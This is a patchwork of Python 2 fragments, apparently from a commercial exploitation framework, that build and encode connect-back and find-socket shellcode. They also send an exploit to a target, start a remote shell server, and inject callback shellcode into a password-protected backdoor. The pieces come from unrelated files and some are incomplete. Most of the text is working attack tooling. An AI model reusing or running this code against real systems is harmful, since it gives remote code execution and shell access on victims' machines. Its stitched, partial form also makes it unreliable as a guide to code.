def createShellcode(self): self.log("Using GO Linux findsck shellcode with MOSDEF") import shellcodeGenerator self.createLinuxGOShellcode(self.badstring) #initial shellcode myshellcode=shellcodeGenerator.linux_X86() myshellcode.addAttr("read_and_exec",{"fdreg": "ebx"}) self.stage2=myshellcode.get()
def getGOcode(): # this is called from tcpexploit # where encoding is taken care of sc = shellcodeGenerator.linux_X86() sc.addAttr("oldGOFindSock", None) shellcode = sc.get() return shellcode
def createShellcode(self): localhost = self.callback.ip localport = self.callback.port if self.version == 0: self.localhost = localhost self.localport = localport return "" if self.versions[self.version][0].count("Windows"): sc = shellcodeGenerator.win32() #sc.addAttr("ForkLoad", None) # the to fork code #sc.addAttr("revert_to_self_before_importing_ws2_32", None) #sc.addAttr("unhandled_exception_filter",None) self.log("Generating shellcode with port %s and ip %s" % (localport, localhost)) sc.addAttr("tcpconnect", { "port": localport, "ipaddress": localhost }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF self.shellcode = sc.get() self.log("Raw win32 shellcode length: %d" % len(self.shellcode)) #return self.createWin32Shellcode(self.badstring,localhost,localport) elif self.versions[self.version][0].count("Linux"): #self.shellcode="\xcc"*500 myshellcode = shellcodeGenerator.linux_X86() if localport == 0: self.log("Why is port zero?") return "" myshellcode.addAttr("connect", { "ipaddress": localhost, "port": localport }) myshellcode.addAttr("read_and_exec", {"fdreg": "esi"}) self.shellcode = myshellcode.get() else: self.log("Cannot yet create shellcode for version %d" % self.version) return "" encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) #self.shellcode = "\xcc"+self.shellcode if self.shellcode == "": self.log("Problem encoding shellcode") return 0 self.log("Shellcode length: %d" % len(self.shellcode)) if len(self.shellcode) > 1020: self.log( "Warning shellcode is %d bytes - longer than the 1020 available..." % (len(self.shellcode))) return self.shellcode
def getcallbackcode(localip, localport, proc="x86"): """ Standard callback shellcode for MOSDEF - normalizes the stack Does not do any encoding Only for x86 for now. """ myshellcode = shellcodeGenerator.linux_X86() #you need a linux execve listener on the host and port... myshellcode.addAttr("Normalize Stack", [0]) myshellcode.addAttr("connect", {"ipaddress": localip, "port": localport}) #myshellcode.addAttr("addcode",["movl %esi,%ebx\n"]) #read needs ebx to be the socket #myshellcode.addAttr("debugme",None) myshellcode.addAttr("read_and_exec", {"fdreg": "esi"}) shellcode = myshellcode.get() return shellcode
def createShellcode(self): localhost = self.callback.ip localport = self.callback.port myshellcode = shellcodeGenerator.linux_X86() myshellcode.addAttr("connect", { "ipaddress": localhost, "port": localport }) myshellcode.addAttr("read_and_exec", {"fdreg": "esi"}) shellcode = myshellcode.get() badstring = "\x00" encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(badstring) self.shellcode = encoder.encode(shellcode) if self.shellcode == "": raise Exception, "error encoding shellcode" self.log("Shellcode length: %d" % len(self.shellcode)) return self.shellcode
def run(self): #print "Self.version=%d"%self.version if self.version == 0: if self.runTest() == 0: self.log("Not continuing since test failed to set version") return 0 else: self.createShellcode() if self.fillstacks() == 0: return 0 self.log("Done filling all stacks") try: #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = self.gettcpsock() s.connect((self.host, self.port)) except: self.log( "Connection attempt reported no open socket - service died?") return 0 sploitstring = self.makesploit() self.websend(s, sploitstring) sck = s verstr = self.versions[self.version][0] if verstr.count("Linux"): myshellcode = shellcodeGenerator.linux_X86() myshellcode.addAttr("setblocking", None) myshellcode.addAttr("read_and_exec", {"fdreg": "ebx"}) sc = myshellcode.get() if linuxshell.doGOhandshake(s, secondstage=sc): node = linuxNode() node.parentnode = self.socknode linuxMosdefShellServer.linuxshellserver( s, node, logfunction=self.logfunction) self.log("Calling startup for MOSDEF shell server") node.startup() self.setInfo("%s attacking %s:%d (Succeeded!)" % (NAME, self.host, self.port)) return node #data=self.webrecv(s) #self.log("Data=%s"%data) return 1
def injectMosdef(self, node): #first generate our callback shellcode sc = shellcodeGenerator.linux_X86() sc.addAttr('mmap_callback', { 'host': self.callback.ip, 'port': self.callback.port }) shellcode = sc.get() packet = "" packet += "immbkd" #do md5 calculation ##m = md5.new() m = hashlib.md5() n = self.passwd + shellcode print("Dumping string before MD5") for c in n: print "%#x" % ord(c), print("\n*****************************\n") m.update(n) print(self.passwd) print(m.hexdigest()) packet += m.digest() packet += struct.pack("<L", len(shellcode)) packet += shellcode for c in packet: print "%#02x" % ord(c), print("\n\n") #Debug s = self.gettcpsock() self.log("Injecting packet on %s port %d" % (self.host, self.port)) try: s.connect((self.host, self.port)) except socket.error: self.log("No connection...") return 0 s.send(packet) s.close() return 1
print """ Add Encoder 1.0, Immunity, Inc. usage: addencoder.py -f shellcode """ sys.exit(2) #this stuff happens. if __name__ == '__main__': print "Running Chunked Additive Encoder v 1.0" app = intelchunkedaddencoder() sys.path.append("./shellcode") import shellcodeGenerator myshellcode = shellcodeGenerator.linux_X86() #myshellcode.addAttr("Normalize Stack",[0]) #myshellcode.addAttr("dup2",None) myshellcode.addAttr("setuid", None) #myshellcode.addAttr("debugme",None) myshellcode.addAttr("execve", { "argv": ["/bin/sh", "-i"], "envp": [], "filename": "/bin/sh" }) sc = myshellcode.get() app.setbadstring("\x00\r\n\x20&") data = app.encode(sc) print "Shellcode=%s" % hexprint(data) import makeexe
def createShellcode(self): sc = shellcodeGenerator.linux_X86() sc.addAttr('read_and_exec', {'fdreg': 'ebx'}) sc = sc.get()
def getNewGOcodeWithShell(): import shellcodeGenerator sc = shellcodeGenerator.linux_X86() sc.addAttr("GOFindSockWithShell", None) shellcode = sc.get() return shellcode